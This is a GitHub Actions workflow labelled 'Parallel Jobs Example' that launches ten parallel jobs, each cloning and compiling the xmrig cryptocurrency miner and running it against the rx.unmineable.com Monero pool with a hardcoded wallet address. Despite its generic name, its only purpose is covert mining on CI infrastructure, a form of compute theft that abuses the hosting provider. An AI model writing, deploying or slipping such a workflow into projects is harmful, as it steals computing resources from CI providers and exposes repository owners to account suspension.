name: Parallel Jobs Example

on:
  workflow_dispatch:  # Manual trigger

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]  # Create 10 jobs in parallel

    steps:
      - name: Check out repository
        uses: actions/checkout@v2

      - name: Build and Run xmrig Instance ${{ matrix.instance }}
        run: |
          echo "Running instance number ${{ matrix.instance }} in Docker..."
          docker run --rm -v ${{ github.workspace }}:/workspace -w /workspace ubuntu:latest bash -c "
          apt update && \
          apt install -y git build-essential cmake libuv1-dev libssl-dev libhwloc-dev && \
          git clone https://github.com/xmrig/xmrig.git && \
          cd xmrig && \
          mkdir build && \
          cd build && \
          cmake .. && \
          make && \
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:88ShoRuQAns2zfCrQWqC9M6bBjCCBf4xs7TNyXDK3iHsdkQTRaK75MNUxqzw4X62bwF2ik6HwBeJeNdsTTy98MUnS9Q4Rmp.unmineable_worker_owqndft#mvbs-zlx7 -p x
          "
          
